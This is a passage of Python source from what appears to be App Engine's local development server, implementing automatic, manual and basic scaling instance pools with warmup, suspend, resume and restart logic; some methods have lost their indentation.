                                      self._php_executable_path,
                                      self._enable_php_remote_debugging,
                                      self._python_config,
                                      self._cloud_sql_config,
                                      self._default_version_port,
                                      self._port_registry,
                                      self._request_data,
                                      self._dispatcher,
                                      self._use_mtime_file_watcher,
                                      self._allow_skipped_files)
    else:
      raise NotImplementedError('runtime does not support interactive commands')

  def build_request_environ(self, method, relative_url, headers, body,
                            source_ip, port, fake_login=False):
    """Build a PEP-333 environ dict for an internally generated request."""
    if isinstance(body, unicode):
      body = body.encode('ascii')

    url = urlparse.urlsplit(relative_url)
    if port != 80:
      host = '%s:%s' % (self.host, port)
    else:
      host = self.host
    environ = {constants.FAKE_IS_ADMIN_HEADER: '1',
               'CONTENT_LENGTH': str(len(body)),
               'PATH_INFO': url.path,
               'QUERY_STRING': url.query,
               'REQUEST_METHOD': method,
               'REMOTE_ADDR': source_ip,
               'SERVER_NAME': self.host,
               'SERVER_PORT': str(port),
               'SERVER_PROTOCOL': 'HTTP/1.1',
               'wsgi.version': (1, 0),
               'wsgi.url_scheme': 'http',
               'wsgi.errors': cStringIO.StringIO(),
               'wsgi.multithread': True,
               'wsgi.multiprocess': True,
               'wsgi.input': cStringIO.StringIO(body)}
    if fake_login:
      environ[constants.FAKE_LOGGED_IN_HEADER] = '1'
    util.put_headers_in_environ(headers, environ)
    environ['HTTP_HOST'] = host
    return environ
class AutoScalingServer(Server):
  """A pool of instances that is autoscaled based on traffic."""

  # The minimum number of seconds to wait, after quitting an idle instance,
  # before quitting another idle instance.
  _MIN_SECONDS_BETWEEN_QUITS = 60
  # The time horizon to use when calculating the number of instances required
  # to serve the current level of traffic.
  _REQUIRED_INSTANCE_WINDOW_SECONDS = 60

  # Defaults substituted for AutomaticScaling attributes that are unset or
  # set to 'automatic' in the server configuration.
  _DEFAULT_AUTOMATIC_SCALING = appinfo.AutomaticScaling(
      min_pending_latency='0.1s',
      max_pending_latency='0.5s',
      min_idle_instances=1,
      max_idle_instances=1000)
@staticmethod
def _parse_pending_latency(timing):
"""Parse a pending latency string into a float of the value in seconds.
Args:
timing: A str of the form 1.0s or 1000ms.
Returns:
A float representation of the value in seconds.
"""
if timing.endswith('ms'):
return float(timing[:-2]) / 1000
else:
return float(timing[:-1])
@classmethod
def _populate_default_automatic_scaling(cls, automatic_scaling):
for attribute in automatic_scaling.ATTRIBUTES:
if getattr(automatic_scaling, attribute) in ('automatic', None):
setattr(automatic_scaling, attribute,
getattr(cls._DEFAULT_AUTOMATIC_SCALING, attribute))
def _process_automatic_scaling(self, automatic_scaling):
if automatic_scaling:
self._populate_default_automatic_scaling(automatic_scaling)
else:
automatic_scaling = self._DEFAULT_AUTOMATIC_SCALING
self._min_pending_latency = self._parse_pending_latency(
automatic_scaling.min_pending_latency)
self._max_pending_latency = self._parse_pending_latency(
automatic_scaling.max_pending_latency)
self._min_idle_instances = int(automatic_scaling.min_idle_instances)
self._max_idle_instances = int(automatic_scaling.max_idle_instances)
  def __init__(self,
               server_configuration,
               host,
               balanced_port,
               api_port,
               auth_domain,
               runtime_stderr_loglevel,
               php_executable_path,
               enable_php_remote_debugging,
               python_config,
               cloud_sql_config,
               default_version_port,
               port_registry,
               request_data,
               dispatcher,
               max_instances,
               use_mtime_file_watcher,
               automatic_restarts,
               allow_skipped_files):
    """Initializer for AutoScalingServer.

    Args:
      server_configuration: An application_configuration.ServerConfiguration
          instance storing the configuration data for a server.
      host: A string containing the host that any HTTP servers should bind to
          e.g. "localhost".
      balanced_port: An int specifying the port where the balanced server for
          the pool should listen.
      api_port: The port that APIServer listens for RPC requests on.
      auth_domain: A string containing the auth domain to set in the
          environment variables.
      runtime_stderr_loglevel: An int representing the minimum logging level
          at which runtime log messages should be written to stderr. See
          devappserver2.py for possible values.
      php_executable_path: A string containing the path to PHP execution e.g.
          "/usr/bin/php-cgi".
      enable_php_remote_debugging: A boolean indicating whether the PHP
          interpreter should be started with XDebug remote debugging enabled.
      python_config: A runtime_config_pb2.PythonConfig instance containing
          Python runtime-specific configuration. If None then defaults are
          used.
      cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
          required configuration for local Google Cloud SQL development. If
          None then Cloud SQL will not be available.
      default_version_port: An int containing the port of the default version.
      port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
          with a mapping of port to Server and Instance.
      request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
          with request information for use by API stubs.
      dispatcher: A Dispatcher instance that can be used to make HTTP requests.
      max_instances: The maximum number of instances to create for this server.
          If None then there is no limit on the number of created instances.
      use_mtime_file_watcher: A bool containing whether to use mtime polling
          to monitor file changes even if other options are available on the
          current platform.
      automatic_restarts: If True then instances will be restarted when a
          file or configuration change that affects them is detected.
      allow_skipped_files: If True then all files in the application's
          directory are readable, even if they appear in a static handler or
          "skip_files" directive.
    """
    super(AutoScalingServer, self).__init__(server_configuration,
                                            host,
                                            balanced_port,
                                            api_port,
                                            auth_domain,
                                            runtime_stderr_loglevel,
                                            php_executable_path,
                                            enable_php_remote_debugging,
                                            python_config,
                                            cloud_sql_config,
                                            default_version_port,
                                            port_registry,
                                            request_data,
                                            dispatcher,
                                            max_instances,
                                            use_mtime_file_watcher,
                                            automatic_restarts,
                                            allow_skipped_files)
    self._process_automatic_scaling(
        self._server_configuration.automatic_scaling)

    self._instances = set()  # Protected by self._condition.
    # A deque containing (time, num_outstanding_instance_requests) 2-tuples.
    # This is used to track the maximum number of outstanding requests in a
    # time period. Protected by self._condition.
    self._outstanding_request_history = collections.deque()
    self._num_outstanding_instance_requests = 0  # Protected by self._condition.
    # The time when the last instance was quit in seconds since the epoch.
    self._last_instance_quit_time = 0  # Protected by self._condition.

    self._condition = threading.Condition()  # Protects instance state.

    # Background thread that grows/shrinks the pool; started in start().
    self._instance_adjustment_thread = threading.Thread(
        target=self._loop_adjusting_instances)
  def start(self):
    """Start background management of the Server."""
    self._balanced_server.start()
    self._port_registry.add(self.balanced_port, self, None)
    if self._watcher:
      self._watcher.start()
    self._instance_adjustment_thread.start()

  def quit(self):
    """Stops the Server."""
    self._quit_event.set()
    self._instance_adjustment_thread.join()
    # The instance adjustment thread depends on the balanced server and the
    # watcher so wait for it to exit before quitting them.
    if self._watcher:
      self._watcher.quit()
    self._balanced_server.quit()
    with self._condition:
      instances = self._instances
      self._instances = set()
      # Wake any waiters so they observe the emptied pool and give up.
      self._condition.notify_all()
    for inst in instances:
      inst.quit(force=True)
@property
def instances(self):
"""A set of all the instances currently in the Server."""
with self._condition:
return set(self._instances)
@property
def num_outstanding_instance_requests(self):
"""The number of requests that instances are currently handling."""
with self._condition:
return self._num_outstanding_instance_requests
  def _handle_instance_request(self,
                               environ,
                               start_response,
                               url_map,
                               match,
                               request_id,
                               inst,
                               request_type):
    """Handles a request routed to a particular Instance.

    Args:
      environ: An environ dict for the request as defined in PEP-333.
      start_response: A function with semantics defined in PEP-333.
      url_map: An appinfo.URLMap instance containing the configuration for the
          handler that matched.
      match: A re.MatchObject containing the result of the matched URL pattern.
      request_id: A unique string id associated with the request.
      inst: The instance.Instance to send the request to.
      request_type: The type of the request. See instance.*_REQUEST module
          constants.

    Returns:
      An iterable over strings containing the body of the HTTP response.
    """
    # Ready (warmup) requests are excluded from the load statistics that
    # drive autoscaling.
    if request_type != instance.READY_REQUEST:
      with self._condition:
        self._num_outstanding_instance_requests += 1
        self._outstanding_request_history.append(
            (time.time(), self.num_outstanding_instance_requests))
    try:
      logging.debug('Dispatching request to %s', inst)
      return inst.handle(environ, start_response, url_map, match, request_id,
                         request_type)
    finally:
      with self._condition:
        if request_type != instance.READY_REQUEST:
          self._num_outstanding_instance_requests -= 1
        # Wake one waiter: capacity may have been freed on this instance.
        self._condition.notify()
  def _handle_script_request(self,
                             environ,
                             start_response,
                             url_map,
                             match,
                             request_id,
                             inst=None,
                             request_type=instance.NORMAL_REQUEST):
    """Handles a HTTP request that has matched a script handler.

    Args:
      environ: An environ dict for the request as defined in PEP-333.
      start_response: A function with semantics defined in PEP-333.
      url_map: An appinfo.URLMap instance containing the configuration for the
          handler that matched.
      match: A re.MatchObject containing the result of the matched URL pattern.
      request_id: A unique string id associated with the request.
      inst: The instance.Instance to send the request to. If None then an
          appropriate instance.Instance will be chosen.
      request_type: The type of the request. See instance.*_REQUEST module
          constants.

    Returns:
      An iterable over strings containing the body of the HTTP response.
    """
    if inst is not None:
      return self._handle_instance_request(
          environ, start_response, url_map, match, request_id, inst,
          request_type)

    with self._condition:
      self._num_outstanding_instance_requests += 1
      self._outstanding_request_history.append(
          (time.time(), self.num_outstanding_instance_requests))
    try:
      start_time = time.time()
      # Initially wait only min_pending_latency before growing the pool.
      timeout_time = start_time + self._min_pending_latency
      # Loop until an instance is available to handle the request.
      while True:
        if self._quit_event.is_set():
          return self._error_response(environ, start_response, 404)
        inst = self._choose_instance(timeout_time)
        if not inst:
          inst = self._add_instance(permit_warmup=False)
          if not inst:
            # No instance is available nor can a new one be created, so loop
            # waiting for one to be free.
            timeout_time = time.time() + 0.2
            continue
        try:
          logging.debug('Dispatching request to %s after %0.4fs pending',
                        inst, time.time() - start_time)
          return inst.handle(environ,
                             start_response,
                             url_map,
                             match,
                             request_id,
                             request_type)
        except instance.CannotAcceptRequests:
          # The chosen instance became unavailable; pick another.
          continue
    finally:
      with self._condition:
        self._num_outstanding_instance_requests -= 1
        self._condition.notify()
  def _add_instance(self, permit_warmup):
    """Creates and adds a new instance.Instance to the Server.

    Args:
      permit_warmup: If True then the new instance.Instance will be sent a new
          warmup request if it is configured to receive them.

    Returns:
      The newly created instance.Instance. Returns None if no new instance
      could be created because the maximum number of instances have already
      been created.
    """
    if self._max_instances is not None:
      with self._condition:
        if len(self._instances) >= self._max_instances:
          return None
    # Only send a warmup request when allowed AND the app opted in via the
    # 'warmup' inbound service.
    perform_warmup = permit_warmup and (
        'warmup' in (self._server_configuration.inbound_services or []))
    inst = self._instance_factory.new_instance(
        self.generate_instance_id(),
        expect_ready_request=perform_warmup)
    with self._condition:
      if self._quit_event.is_set():
        return None
      self._instances.add(inst)
    if not inst.start():
      return None
    if perform_warmup:
      self._async_warmup(inst)
    else:
      # No warmup needed: wake waiters, the instance can take requests now.
      with self._condition:
        self._condition.notify(self.max_instance_concurrent_requests)
    logging.debug('Created instance: %s', inst)
    return inst
@staticmethod
def generate_instance_id():
return ''.join(random.choice(_LOWER_HEX_DIGITS) for _ in range(36))
def _warmup(self, inst):
"""Send a warmup request to the given instance."""
try:
environ = self.build_request_environ(
'GET', '/_ah/warmup', [], '', '0.1.0.3', self.balanced_port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling warmup request.')
def _async_warmup(self, inst):
"""Asynchronously send a markup request to the given Instance."""
_THREAD_POOL.submit(self._warmup, inst)
def _trim_outstanding_request_history(self):
"""Removes obsolete entries from _outstanding_request_history."""
window_start = time.time() - self._REQUIRED_INSTANCE_WINDOW_SECONDS
with self._condition:
while self._outstanding_request_history:
t, _ = self._outstanding_request_history[0]
if t < window_start:
self._outstanding_request_history.popleft()
else:
break
def _get_num_required_instances(self):
"""Returns the number of Instances required to handle the request load."""
with self._condition:
self._trim_outstanding_request_history()
if not self._outstanding_request_history:
return 0
else:
peak_concurrent_requests = max(
current_requests
for (t, current_requests)
in self._outstanding_request_history)
return int(math.ceil(peak_concurrent_requests /
self.max_instance_concurrent_requests))
def _split_instances(self):
"""Returns a 2-tuple representing the required and extra Instances.
Returns:
A 2-tuple of (required_instances, not_required_instances):
required_instances: The set of the instance.Instances, in a state that
can handle requests, required to handle the current
request load.
not_required_instances: The set of the Instances contained in this
Server that not are not required.
"""
with self._condition:
num_required_instances = self._get_num_required_instances()
available = [inst for inst in self._instances
if inst.can_accept_requests]
available.sort(key=lambda inst: -inst.num_outstanding_requests)
required = set(available[:num_required_instances])
return required, self._instances - required
  def _choose_instance(self, timeout_time):
    """Returns the best Instance to handle a request or None if all are busy.

    Args:
      timeout_time: An epoch time (seconds) after which waiting is abandoned.
    """
    with self._condition:
      while time.time() < timeout_time:
        required_instances, not_required_instances = self._split_instances()
        if required_instances:
          # Pick the instance with the most remaining capacity to handle
          # requests.
          required_instances = sorted(
              required_instances,
              key=lambda inst: inst.remaining_request_capacity)
          if required_instances[-1].remaining_request_capacity:
            return required_instances[-1]
        available_instances = [inst for inst in not_required_instances
                               if inst.remaining_request_capacity > 0 and
                               inst.can_accept_requests]
        if available_instances:
          # Pick the instance with the *least* capacity to handle requests
          # to avoid using unnecessary idle instances.
          # NOTE(review): the lambda parameter shadows the module-level
          # 'instance' import within this expression.
          available_instances.sort(
              key=lambda instance: instance.num_outstanding_requests)
          return available_instances[-1]
        else:
          # Nothing can take the request yet: block until an instance frees
          # up (notify) or the timeout expires.
          self._condition.wait(timeout_time - time.time())
      return None
  def _adjust_instances(self):
    """Creates new Instances or deletes idle Instances based on current load."""
    now = time.time()
    with self._condition:
      _, not_required_instances = self._split_instances()

    if len(not_required_instances) < self._min_idle_instances:
      # Too few idle instances: grow the pool by one (warmup permitted).
      self._add_instance(permit_warmup=True)
    elif (len(not_required_instances) > self._max_idle_instances and
          now >
          (self._last_instance_quit_time + self._MIN_SECONDS_BETWEEN_QUITS)):
      # Too many idle instances: quit at most one per call, rate-limited by
      # _MIN_SECONDS_BETWEEN_QUITS.
      for inst in not_required_instances:
        if not inst.num_outstanding_requests:
          try:
            inst.quit()
          except instance.CannotQuitServingInstance:
            pass
          else:
            self._last_instance_quit_time = now
            logging.debug('Quit instance: %s', inst)
            with self._condition:
              self._instances.discard(inst)
            break

  def _loop_adjusting_instances(self):
    """Loops until the Server exits, reloading, adding or removing Instances."""
    while not self._quit_event.is_set():
      if self.ready:
        if self._automatic_restarts:
          self._handle_changes()
        self._adjust_instances()
      self._quit_event.wait(timeout=1)

  def __call__(self, environ, start_response):
    # WSGI entry point: route through the balanced request handler.
    return self._handle_request(environ, start_response)
class ManualScalingServer(Server):
  """A pool of instances that is manually-scaled."""

  # Default used when app.yaml leaves manual_scaling unset.
  _DEFAULT_MANUAL_SCALING = appinfo.ManualScaling(instances='1')

  # Maximum seconds a request may wait for an instance before a 503.
  _MAX_REQUEST_WAIT_TIME = 10
@classmethod
def _populate_default_manual_scaling(cls, manual_scaling):
for attribute in manual_scaling.ATTRIBUTES:
if getattr(manual_scaling, attribute) in ('manual', None):
setattr(manual_scaling, attribute,
getattr(cls._DEFAULT_MANUAL_SCALING, attribute))
def _process_manual_scaling(self, manual_scaling):
if manual_scaling:
self._populate_default_manual_scaling(manual_scaling)
else:
manual_scaling = self._DEFAULT_MANUAL_SCALING
self._initial_num_instances = int(manual_scaling.instances)
  def __init__(self,
               server_configuration,
               host,
               balanced_port,
               api_port,
               auth_domain,
               runtime_stderr_loglevel,
               php_executable_path,
               enable_php_remote_debugging,
               python_config,
               cloud_sql_config,
               default_version_port,
               port_registry,
               request_data,
               dispatcher,
               max_instances,
               use_mtime_file_watcher,
               automatic_restarts,
               allow_skipped_files):
    """Initializer for ManualScalingServer.

    Args:
      server_configuration: An application_configuration.ServerConfiguration
          instance storing the configuration data for a server.
      host: A string containing the host that any HTTP servers should bind to
          e.g. "localhost".
      balanced_port: An int specifying the port where the balanced server for
          the pool should listen.
      api_port: The port that APIServer listens for RPC requests on.
      auth_domain: A string containing the auth domain to set in the
          environment variables.
      runtime_stderr_loglevel: An int representing the minimum logging level
          at which runtime log messages should be written to stderr. See
          devappserver2.py for possible values.
      php_executable_path: A string containing the path to PHP execution e.g.
          "/usr/bin/php-cgi".
      enable_php_remote_debugging: A boolean indicating whether the PHP
          interpreter should be started with XDebug remote debugging enabled.
      python_config: A runtime_config_pb2.PythonConfig instance containing
          Python runtime-specific configuration. If None then defaults are
          used.
      cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
          required configuration for local Google Cloud SQL development. If
          None then Cloud SQL will not be available.
      default_version_port: An int containing the port of the default version.
      port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
          with a mapping of port to Server and Instance.
      request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
          with request information for use by API stubs.
      dispatcher: A Dispatcher instance that can be used to make HTTP requests.
      max_instances: The maximum number of instances to create for this server.
          If None then there is no limit on the number of created instances.
      use_mtime_file_watcher: A bool containing whether to use mtime polling
          to monitor file changes even if other options are available on the
          current platform.
      automatic_restarts: If True then instances will be restarted when a
          file or configuration change that affects them is detected.
      allow_skipped_files: If True then all files in the application's
          directory are readable, even if they appear in a static handler or
          "skip_files" directive.
    """
    super(ManualScalingServer, self).__init__(server_configuration,
                                              host,
                                              balanced_port,
                                              api_port,
                                              auth_domain,
                                              runtime_stderr_loglevel,
                                              php_executable_path,
                                              enable_php_remote_debugging,
                                              python_config,
                                              cloud_sql_config,
                                              default_version_port,
                                              port_registry,
                                              request_data,
                                              dispatcher,
                                              max_instances,
                                              use_mtime_file_watcher,
                                              automatic_restarts,
                                              allow_skipped_files)
    self._process_manual_scaling(server_configuration.manual_scaling)

    self._instances = []  # Protected by self._condition.
    self._wsgi_servers = []  # Protected by self._condition.
    # Whether the server has been stopped. Protected by self._condition.
    self._suspended = False

    self._condition = threading.Condition()  # Protects instance state.

    # Serializes operations that modify the serving state of or number of
    # instances.
    self._instances_change_lock = threading.RLock()

    # Background thread that restarts instances on file/config changes;
    # started in start().
    self._change_watcher_thread = threading.Thread(
        target=self._loop_watching_for_changes)
  def start(self):
    """Start background management of the Server."""
    self._balanced_server.start()
    self._port_registry.add(self.balanced_port, self, None)
    if self._watcher:
      self._watcher.start()
    self._change_watcher_thread.start()
    with self._instances_change_lock:
      # Respect max_instances if configured; otherwise start exactly the
      # manually-configured count.
      if self._max_instances is not None:
        initial_num_instances = min(self._max_instances,
                                    self._initial_num_instances)
      else:
        initial_num_instances = self._initial_num_instances
      for _ in xrange(initial_num_instances):
        self._add_instance()

  def quit(self):
    """Stops the Server."""
    self._quit_event.set()
    self._change_watcher_thread.join()
    # The change watcher thread depends on the balanced server and the
    # watcher so wait for it to exit before quitting them.
    if self._watcher:
      self._watcher.quit()
    self._balanced_server.quit()
    for wsgi_servr in self._wsgi_servers:
      wsgi_servr.quit()
    with self._condition:
      instances = self._instances
      self._instances = []
      # Wake any waiters so they observe the emptied pool and give up.
      self._condition.notify_all()
    for inst in instances:
      inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Server."""
with self._condition:
return set(self._instances)
  def _handle_instance_request(self,
                               environ,
                               start_response,
                               url_map,
                               match,
                               request_id,
                               inst,
                               request_type):
    """Handles a request routed to a particular Instance.

    Args:
      environ: An environ dict for the request as defined in PEP-333.
      start_response: A function with semantics defined in PEP-333.
      url_map: An appinfo.URLMap instance containing the configuration for the
          handler that matched.
      match: A re.MatchObject containing the result of the matched URL pattern.
      request_id: A unique string id associated with the request.
      inst: The instance.Instance to send the request to.
      request_type: The type of the request. See instance.*_REQUEST module
          constants.

    Returns:
      An iterable over strings containing the body of the HTTP response.
    """
    start_time = time.time()
    timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
    try:
      while time.time() < timeout_time:
        logging.debug('Dispatching request to %s after %0.4fs pending',
                      inst, time.time() - start_time)
        try:
          return inst.handle(environ, start_response, url_map, match,
                             request_id, request_type)
        except instance.CannotAcceptRequests:
          pass
        # Block until the instance can take requests or the deadline passes.
        inst.wait(timeout_time)
        if inst.has_quit:
          return self._error_response(environ, start_response, 503)
      else:
        # while/else: the deadline expired without the instance accepting
        # the request.
        return self._error_response(environ, start_response, 503)
    finally:
      with self._condition:
        self._condition.notify()
  def _handle_script_request(self,
                             environ,
                             start_response,
                             url_map,
                             match,
                             request_id,
                             inst=None,
                             request_type=instance.NORMAL_REQUEST):
    """Handles a HTTP request that has matched a script handler.

    Args:
      environ: An environ dict for the request as defined in PEP-333.
      start_response: A function with semantics defined in PEP-333.
      url_map: An appinfo.URLMap instance containing the configuration for the
          handler that matched.
      match: A re.MatchObject containing the result of the matched URL pattern.
      request_id: A unique string id associated with the request.
      inst: The instance.Instance to send the request to. If None then an
          appropriate instance.Instance will be chosen.
      request_type: The type of the request. See instance.*_REQUEST module
          constants.

    Returns:
      An iterable over strings containing the body of the HTTP response.
    """
    # A suspended server rejects normal/ready traffic with a 404.
    if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
         self._suspended) or self._quit_event.is_set()):
      return self._error_response(environ, start_response, 404)
    if self._server_configuration.is_backend:
      environ['BACKEND_ID'] = self._server_configuration.server_name
    else:
      environ['BACKEND_ID'] = (
          self._server_configuration.version_id.split('.', 1)[0])
    if inst is not None:
      return self._handle_instance_request(
          environ, start_response, url_map, match, request_id, inst,
          request_type)

    start_time = time.time()
    timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME

    while time.time() < timeout_time:
      # Re-check suspension/quit on every iteration: state can change while
      # the request is pending.
      if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST)
           and self._suspended) or self._quit_event.is_set()):
        return self._error_response(environ, start_response, 404)
      inst = self._choose_instance(timeout_time)
      if inst:
        try:
          logging.debug('Dispatching request to %s after %0.4fs pending',
                        inst, time.time() - start_time)
          return inst.handle(environ, start_response, url_map, match,
                             request_id, request_type)
        except instance.CannotAcceptRequests:
          continue
        finally:
          with self._condition:
            self._condition.notify()
    else:
      # while/else: no instance accepted the request before the deadline.
      return self._error_response(environ, start_response, 503)
  def _add_instance(self):
    """Creates and adds a new instance.Instance to the Server.

    This must be called with _instances_change_lock held.
    """
    instance_id = self.get_num_instances()
    assert self._max_instances is None or instance_id < self._max_instances
    inst = self._instance_factory.new_instance(instance_id,
                                               expect_ready_request=True)
    # Each manual-scaling instance gets its own WSGI server on an
    # OS-assigned port (port 0).
    wsgi_servr = wsgi_server.WsgiServer(
        (self._host, 0), functools.partial(self._handle_request, inst=inst))
    wsgi_servr.start()
    self._port_registry.add(wsgi_servr.port, self, inst)
    with self._condition:
      if self._quit_event.is_set():
        return
      self._wsgi_servers.append(wsgi_servr)
      self._instances.append(inst)
      suspended = self._suspended
    if not suspended:
      self._async_start_instance(wsgi_servr, inst)

  def _async_start_instance(self, wsgi_servr, inst):
    """Start the given instance on a thread-pool worker."""
    _THREAD_POOL.submit(self._start_instance, wsgi_servr, inst)
def _start_instance(self, wsgi_servr, inst):
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
for inst in self._instances:
if inst.can_accept_requests:
return inst
self._condition.wait(timeout_time - time.time())
return None
  def _handle_changes(self):
    """Handle file or configuration changes."""
    # Always check for config and file changes because checking also clears
    # pending changes.
    config_changes = self._server_configuration.check_for_updates()
    has_file_changes = self._watcher.has_changes()

    if application_configuration.HANDLERS_CHANGED in config_changes:
      handlers = self._create_url_handlers()
      with self._handler_lock:
        self._handlers = handlers

    if has_file_changes:
      self._instance_factory.files_changed()
    if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
      self._instance_factory.configuration_changed(config_changes)

    # Only restart running instances; a suspended server picks the changes
    # up when resumed.
    if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
      with self._instances_change_lock:
        if not self._suspended:
          self.restart()

  def _loop_watching_for_changes(self):
    """Loops until the InstancePool is done watching for file changes."""
    while not self._quit_event.is_set():
      if self.ready:
        if self._automatic_restarts:
          self._handle_changes()
      self._quit_event.wait(timeout=1)
def get_num_instances(self):
with self._instances_change_lock:
with self._condition:
return len(self._instances)
  def set_num_instances(self, instances):
    """Grow or shrink the pool to the requested number of instances."""
    if self._max_instances is not None:
      instances = min(instances, self._max_instances)

    with self._instances_change_lock:
      with self._condition:
        running_instances = self.get_num_instances()
        if running_instances > instances:
          # Detach the surplus instances/servers under the condition lock;
          # they are quit asynchronously below, outside the locks.
          wsgi_servers_to_quit = self._wsgi_servers[instances:]
          del self._wsgi_servers[instances:]
          instances_to_quit = self._instances[instances:]
          del self._instances[instances:]
      if running_instances < instances:
        for _ in xrange(instances - running_instances):
          self._add_instance()
    if running_instances > instances:
      for inst, wsgi_servr in zip(instances_to_quit, wsgi_servers_to_quit):
        self._async_quit_instance(inst, wsgi_servr)

  def _async_quit_instance(self, inst, wsgi_servr):
    """Quit the given instance on a thread-pool worker."""
    _THREAD_POOL.submit(self._quit_instance, inst, wsgi_servr)

  def _quit_instance(self, inst, wsgi_servr):
    # Capture the port before quitting the server; it is needed for the
    # shutdown request.
    port = wsgi_servr.port
    wsgi_servr.quit()
    inst.quit(expect_shutdown=True)
    self._shutdown_instance(inst, port)
  def suspend(self):
    """Suspends serving for this server, quitting all running instances."""
    with self._instances_change_lock:
      if self._suspended:
        raise request_info.ServerAlreadyStoppedError()
      self._suspended = True
      with self._condition:
        instances_to_stop = zip(self._instances, self._wsgi_servers)
        # Keep the per-instance servers up but have them answer 404.
        for wsgi_servr in self._wsgi_servers:
          wsgi_servr.set_error(404)
    for inst, wsgi_servr in instances_to_stop:
      self._async_suspend_instance(inst, wsgi_servr.port)

  def _async_suspend_instance(self, inst, port):
    """Suspend the given instance on a thread-pool worker."""
    _THREAD_POOL.submit(self._suspend_instance, inst, port)

  def _suspend_instance(self, inst, port):
    inst.quit(expect_shutdown=True)
    self._shutdown_instance(inst, port)
  def resume(self):
    """Resumes serving for this server."""
    with self._instances_change_lock:
      if not self._suspended:
        raise request_info.ServerAlreadyStartedError()
      self._suspended = False
      with self._condition:
        if self._quit_event.is_set():
          return
        wsgi_servers = self._wsgi_servers
      instances_to_start = []
      # Create a fresh instance behind each existing WSGI server, reusing
      # the servers' ports.
      for instance_id, wsgi_servr in enumerate(wsgi_servers):
        inst = self._instance_factory.new_instance(instance_id,
                                                   expect_ready_request=True)
        wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
        self._port_registry.add(wsgi_servr.port, self, inst)
        with self._condition:
          if self._quit_event.is_set():
            return
          self._instances[instance_id] = inst
        instances_to_start.append((wsgi_servr, inst))
    for wsgi_servr, inst in instances_to_start:
      self._async_start_instance(wsgi_servr, inst)
  def restart(self):
    """Restarts the server, replacing all running instances."""
    with self._instances_change_lock:
      with self._condition:
        if self._quit_event.is_set():
          return
        instances_to_stop = self._instances[:]
        wsgi_servers = self._wsgi_servers[:]
      instances_to_start = []
      # Build replacement instances behind the existing WSGI servers so the
      # externally visible ports do not change.
      for instance_id, wsgi_servr in enumerate(wsgi_servers):
        inst = self._instance_factory.new_instance(instance_id,
                                                   expect_ready_request=True)
        wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
        self._port_registry.add(wsgi_servr.port, self, inst)
        instances_to_start.append(inst)
      with self._condition:
        if self._quit_event.is_set():
          return
        self._instances[:] = instances_to_start
    # Stop the old instances and start the new ones outside the locks.
    for inst, wsgi_servr in zip(instances_to_stop, wsgi_servers):
      self._async_suspend_instance(inst, wsgi_servr.port)
    for wsgi_servr, inst in zip(wsgi_servers, instances_to_start):
      self._async_start_instance(wsgi_servr, inst)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
  def __call__(self, environ, start_response, inst=None):
    # WSGI entry point; inst pins the request to a specific instance when a
    # per-instance WSGI server received it.
    return self._handle_request(environ, start_response, inst)

  @property
  def supports_individually_addressable_instances(self):
    # Each manual-scaling instance has its own WSGI server/port.
    return True
class BasicScalingServer(Server):
  """A pool of instances that is basic-scaled."""

  # Defaults applied for fields that app.yaml leaves unset; see
  # _populate_default_basic_scaling.
  _DEFAULT_BASIC_SCALING = appinfo.BasicScaling(max_instances='1',
                                                idle_timeout='15m')

  # Maximum seconds a request may wait for an instance before a 503.
  _MAX_REQUEST_WAIT_TIME = 10
@staticmethod
def _parse_idle_timeout(timing):
"""Parse a idle timeout string into an int of the value in seconds.
Args:
timing: A str of the form 1m or 10s.
Returns:
An int representation of the value in seconds.
"""
if timing.endswith('m'):
return int(timing[:-1]) * 60
else:
return int(timing[:-1])
@classmethod
def _populate_default_basic_scaling(cls, basic_scaling):
for attribute in basic_scaling.ATTRIBUTES:
if getattr(basic_scaling, attribute) in ('basic', None):
setattr(basic_scaling, attribute,
getattr(cls._DEFAULT_BASIC_SCALING, attribute))
def _process_basic_scaling(self, basic_scaling):
if basic_scaling:
self._populate_default_basic_scaling(basic_scaling)
else:
basic_scaling = self._DEFAULT_BASIC_SCALING
if self._max_instances is not None:
self._max_instances = min(self._max_instances,
int(basic_scaling.max_instances))
else:
self._max_instances = int(basic_scaling.max_instances)
self._instance_idle_timeout = self._parse_idle_timeout(
basic_scaling.idle_timeout)
  def __init__(self,
               server_configuration,
               host,
               balanced_port,
               api_port,
               auth_domain,
               runtime_stderr_loglevel,
               php_executable_path,
               enable_php_remote_debugging,
               python_config,
               cloud_sql_config,
               default_version_port,
               port_registry,
               request_data,
               dispatcher,
               max_instances,
